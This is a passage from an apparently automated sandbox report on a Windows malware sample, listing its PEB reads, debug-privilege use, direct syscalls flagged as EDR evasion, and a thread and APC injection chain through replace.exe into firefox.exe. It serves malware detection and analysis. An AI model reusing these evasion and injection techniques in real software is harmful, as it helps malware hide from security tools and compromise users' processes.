                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156EB1D mov eax, dword ptr fs:[00000030h]3_2_0156EB1D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156EB1D mov eax, dword ptr fs:[00000030h]3_2_0156EB1D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156EB1D mov eax, dword ptr fs:[00000030h]3_2_0156EB1D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156EB1D mov eax, dword ptr fs:[00000030h]3_2_0156EB1D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156EB1D mov eax, dword ptr fs:[00000030h]3_2_0156EB1D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156EB1D mov eax, dword ptr fs:[00000030h]3_2_0156EB1D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156EB1D mov eax, dword ptr fs:[00000030h]3_2_0156EB1D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156EB1D mov eax, dword ptr fs:[00000030h]3_2_0156EB1D
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C4B00 mov eax, dword ptr fs:[00000030h]3_2_015C4B00
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151EB20 mov eax, dword ptr fs:[00000030h]3_2_0151EB20
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151EB20 mov eax, dword ptr fs:[00000030h]3_2_0151EB20
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B8B28 mov eax, dword ptr fs:[00000030h]3_2_015B8B28
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015B8B28 mov eax, dword ptr fs:[00000030h]3_2_015B8B28
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F0BCD mov eax, dword ptr fs:[00000030h]3_2_014F0BCD
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F0BCD mov eax, dword ptr fs:[00000030h]3_2_014F0BCD
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F0BCD mov eax, dword ptr fs:[00000030h]3_2_014F0BCD
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159EBD0 mov eax, dword ptr fs:[00000030h]3_2_0159EBD0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01510BCB mov eax, dword ptr fs:[00000030h]3_2_01510BCB
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01510BCB mov eax, dword ptr fs:[00000030h]3_2_01510BCB
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01510BCB mov eax, dword ptr fs:[00000030h]3_2_01510BCB
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157CBF0 mov eax, dword ptr fs:[00000030h]3_2_0157CBF0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151EBFC mov eax, dword ptr fs:[00000030h]3_2_0151EBFC
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F8BF0 mov eax, dword ptr fs:[00000030h]3_2_014F8BF0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F8BF0 mov eax, dword ptr fs:[00000030h]3_2_014F8BF0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F8BF0 mov eax, dword ptr fs:[00000030h]3_2_014F8BF0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015A4BB0 mov eax, dword ptr fs:[00000030h]3_2_015A4BB0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015A4BB0 mov eax, dword ptr fs:[00000030h]3_2_015A4BB0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500BBE mov eax, dword ptr fs:[00000030h]3_2_01500BBE
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500BBE mov eax, dword ptr fs:[00000030h]3_2_01500BBE
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500A5B mov eax, dword ptr fs:[00000030h]3_2_01500A5B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01500A5B mov eax, dword ptr fs:[00000030h]3_2_01500A5B
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F6A50 mov eax, dword ptr fs:[00000030h]3_2_014F6A50
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F6A50 mov eax, dword ptr fs:[00000030h]3_2_014F6A50
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F6A50 mov eax, dword ptr fs:[00000030h]3_2_014F6A50
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F6A50 mov eax, dword ptr fs:[00000030h]3_2_014F6A50
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F6A50 mov eax, dword ptr fs:[00000030h]3_2_014F6A50
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F6A50 mov eax, dword ptr fs:[00000030h]3_2_014F6A50
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F6A50 mov eax, dword ptr fs:[00000030h]3_2_014F6A50
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156CA72 mov eax, dword ptr fs:[00000030h]3_2_0156CA72
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0156CA72 mov eax, dword ptr fs:[00000030h]3_2_0156CA72
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0159EA60 mov eax, dword ptr fs:[00000030h]3_2_0159EA60
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152CA6F mov eax, dword ptr fs:[00000030h]3_2_0152CA6F
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152CA6F mov eax, dword ptr fs:[00000030h]3_2_0152CA6F
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152CA6F mov eax, dword ptr fs:[00000030h]3_2_0152CA6F
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0157CA11 mov eax, dword ptr fs:[00000030h]3_2_0157CA11
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01514A35 mov eax, dword ptr fs:[00000030h]3_2_01514A35
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01514A35 mov eax, dword ptr fs:[00000030h]3_2_01514A35
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152CA24 mov eax, dword ptr fs:[00000030h]3_2_0152CA24
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0151EA2E mov eax, dword ptr fs:[00000030h]3_2_0151EA2E
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01524AD0 mov eax, dword ptr fs:[00000030h]3_2_01524AD0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01524AD0 mov eax, dword ptr fs:[00000030h]3_2_01524AD0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01546ACC mov eax, dword ptr fs:[00000030h]3_2_01546ACC
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01546ACC mov eax, dword ptr fs:[00000030h]3_2_01546ACC
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01546ACC mov eax, dword ptr fs:[00000030h]3_2_01546ACC
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F0AD0 mov eax, dword ptr fs:[00000030h]3_2_014F0AD0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152AAEE mov eax, dword ptr fs:[00000030h]3_2_0152AAEE
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_0152AAEE mov eax, dword ptr fs:[00000030h]3_2_0152AAEE
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01528A90 mov edx, dword ptr fs:[00000030h]3_2_01528A90
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FEA80 mov eax, dword ptr fs:[00000030h]3_2_014FEA80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FEA80 mov eax, dword ptr fs:[00000030h]3_2_014FEA80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FEA80 mov eax, dword ptr fs:[00000030h]3_2_014FEA80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FEA80 mov eax, dword ptr fs:[00000030h]3_2_014FEA80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FEA80 mov eax, dword ptr fs:[00000030h]3_2_014FEA80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FEA80 mov eax, dword ptr fs:[00000030h]3_2_014FEA80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FEA80 mov eax, dword ptr fs:[00000030h]3_2_014FEA80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FEA80 mov eax, dword ptr fs:[00000030h]3_2_014FEA80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014FEA80 mov eax, dword ptr fs:[00000030h]3_2_014FEA80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_015C4A80 mov eax, dword ptr fs:[00000030h]3_2_015C4A80
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F8AA0 mov eax, dword ptr fs:[00000030h]3_2_014F8AA0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_014F8AA0 mov eax, dword ptr fs:[00000030h]3_2_014F8AA0
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeCode function: 3_2_01546AA4 mov eax, dword ptr fs:[00000030h]3_2_01546AA4
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Found direct / indirect Syscall (likely to bypass EDR)
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtAllocateVirtualMemory: Direct from: 0x76F03C9CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtClose: Direct from: 0x76F02B6C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtReadVirtualMemory: Direct from: 0x76F02E8CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtCreateKey: Direct from: 0x76F02C6CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtSetInformationThread: Direct from: 0x76F02B4CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtQueryAttributesFile: Direct from: 0x76F02E6CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtAllocateVirtualMemory: Direct from: 0x76F048ECJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtQuerySystemInformation: Direct from: 0x76F048CCJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtQueryVolumeInformationFile: Direct from: 0x76F02F2CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtOpenSection: Direct from: 0x76F02E0CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtSetInformationThread: Direct from: 0x76EF63F9Jump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtDeviceIoControlFile: Direct from: 0x76F02AECJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtAllocateVirtualMemory: Direct from: 0x76F02BECJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtCreateFile: Direct from: 0x76F02FECJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtOpenFile: Direct from: 0x76F02DCCJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtQueryInformationToken: Direct from: 0x76F02CACJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtTerminateThread: Direct from: 0x76F02FCCJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtOpenKeyEx: Direct from: 0x76F02B9CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtProtectVirtualMemory: Direct from: 0x76F02F9CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtSetInformationProcess: Direct from: 0x76F02C5CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtNotifyChangeKey: Direct from: 0x76F03C2CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtCreateMutant: Direct from: 0x76F035CCJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtWriteVirtualMemory: Direct from: 0x76F02E3CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtMapViewOfSection: Direct from: 0x76F02D1CJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtResumeThread: Direct from: 0x76F036ACJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtAllocateVirtualMemory: Direct from: 0x76F02BFCJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtReadFile: Direct from: 0x76F02ADCJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtQuerySystemInformation: Direct from: 0x76F02DFCJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtDelayExecution: Direct from: 0x76F02DDCJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtQueryInformationProcess: Direct from: 0x76F02C26Jump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtResumeThread: Direct from: 0x76F02FBCJump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeNtCreateUserProcess: Direct from: 0x76F0371CJump to behavior
                  Maps a DLL or memory area into another process
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: NULL target: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe protection: execute and read and writeJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeSection loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe protection: execute and read and writeJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                  Modifies the context of a thread in another process (thread injection)
                  Source: C:\Windows\SysWOW64\replace.exeThread register set: target process: 8184Jump to behavior
                  Queues an APC in another process (thread injection)
                  Source: C:\Windows\SysWOW64\replace.exeThread APC queued: target process: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess created: C:\Users\user\Desktop\MR-239-1599-A.scr.exe "C:\Users\user\Desktop\MR-239-1599-A.scr.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeProcess created: C:\Users\user\Desktop\MR-239-1599-A.scr.exe "C:\Users\user\Desktop\MR-239-1599-A.scr.exe"Jump to behavior
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exeProcess created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"Jump to behavior
                  Source: C:\Windows\SysWOW64\replace.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092706641.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000000.1858089820.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000000.2033212614.0000000000F40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092706641.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000000.1858089820.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000000.2033212614.0000000000F40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092706641.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000000.1858089820.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000000.2033212614.0000000000F40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092706641.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000000.1858089820.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000000.2033212614.0000000000F40000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Users\user\Desktop\MR-239-1599-A.scr.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
